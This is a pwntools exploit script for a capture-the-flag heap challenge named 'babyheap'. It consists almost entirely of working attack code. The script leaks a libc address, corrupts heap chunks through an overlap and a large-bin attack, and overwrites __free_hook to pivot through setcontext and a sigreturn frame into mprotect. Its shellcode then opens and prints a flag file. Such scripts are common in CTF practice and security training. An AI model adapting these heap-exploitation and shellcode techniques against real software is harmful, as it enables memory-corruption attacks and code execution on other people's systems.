from pwn import *
sh = process('./babyheap')
elf = ELF('./babyheap') libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
context.arch = "amd64"
try: f = open('pid', 'w') f.write(str(proc.pidof(sh)[0])) f.close() except Exception as e: print(e)
def add(size): sh.sendline('1') sh.recvuntil('Size: ') sh.sendline(str(size)) sh.recvuntil('Choice: \n')
def edit(index, content): sh.sendline('2') sh.recvuntil('Index: ') sh.sendline(str(index)) sh.recvuntil('Content: ') sh.send(content) sh.recvuntil('Choice: \n')
def delete(index): sh.sendline('3') sh.recvuntil('Index: ') sh.sendline(str(index)) sh.recvuntil('Choice: \n')
def show(index): sh.sendline('4') sh.recvuntil('Index: ') sh.sendline(str(index)) result = sh.recvuntil('\n') sh.recvuntil('Choice: \n') return result[:-1]
sh.recvuntil('Choice: \n')
add(0x80) add(0x68) add(0xf8) add(24)
delete(0) edit(1,'a' * 0x60 + p64(0x100))
delete(2)
add(0x80) add(0x80) delete(2) result = show(1) main_arena_88_addr = u64(result.ljust(8, '\0')) log.success("main_arena_88_addr: " + hex(main_arena_88_addr))
main_arena_addr = main_arena_88_addr - 88 log.success("main_arena_addr: " + hex(main_arena_addr))
main_arena_offset = 0x3c4b20
libc_addr = main_arena_addr - main_arena_offset log.success("libc_addr: " + hex(libc_addr))
system_addr = libc_addr + libc.symbols['system'] log.success("system_addr: " + hex(system_addr))
add(0x160)
add(0x18) add(0x508) add(0x18) add(0x18) add(0x508) add(0x18) add(0x18)
edit(5, 'a'*0x4f0 + p64(0x500))
delete(5)
edit(4, 'a'*(0x18))
add(0x18) add(0x4d8)
delete(5) delete(6)
add(0x30) add(0x4e8)
edit(8, 'a'*(0x4f0) + p64(0x500)) delete(8) edit(7, 'a'*(0x18)) add(0x18) add(0x4d8) delete(8) delete(9) add(0x40)
delete(6)
add(0x4e8) delete(6)
__free_hook_offset = 0x3c67a8 __free_hook_addr = libc_addr + __free_hook_offset
storage = __free_hook_addr fake_chunk = storage - 0x20
layout = [ '\x00' * 16, p64(0), p64(0x4f1), p64(0), p64(fake_chunk) ]
edit(11, flat(layout))
layout = [ '\x00' * 32, p64(0), p64(0x4e1), p64(0), p64(fake_chunk + 8), p64(0), p64(fake_chunk - 0x18 - 5) ]
edit(12, flat(layout))
add(0x48)
new_execve_env = __free_hook_addr & 0xfffffffffffff000 shellcode1 = ''' xor rdi, rdi mov rsi, %d mov edx, 0x1000
mov eax, 0 syscall
jmp rsi ''' % new_execve_env
edit(6, 'a' * 0x10 + p64(libc_addr + libc.symbols['setcontext'] + 53) + p64(__free_hook_addr + 0x10) + asm(shellcode1))
context.arch = "amd64"
frame = SigreturnFrame() frame.rsp = __free_hook_addr + 8 frame.rip = libc_addr + libc.symbols['mprotect'] frame.rdi = new_execve_env frame.rsi = 0x1000 frame.rdx = 4 | 2 | 1
edit(12, str(frame)) sh.sendline('3') sh.recvuntil('Index: ') sh.sendline('12')
shellcode2 = ''' mov rax, 0x67616c662f2e ;// ./flag push rax
mov rdi, rsp ;// ./flag mov rsi, 0 ;// O_RDONLY xor rdx, rdx ;// 置0就行 mov rax, 2 ;// SYS_open syscall
mov rdi, rax ;// fd mov rsi,rsp ;// 读到栈上 mov rdx, 1024 ;// nbytes mov rax,0 ;// SYS_read syscall
mov rdi, 1 ;// fd mov rsi, rsp ;// buf mov rdx, rax ;// count mov rax, 1 ;// SYS_write syscall
mov rdi, 0 ;// error_code mov rax, 60 syscall '''
sh.send(asm(shellcode2))
print(sh.recv())
sh.interactive()
os.system("rm -f pid")
|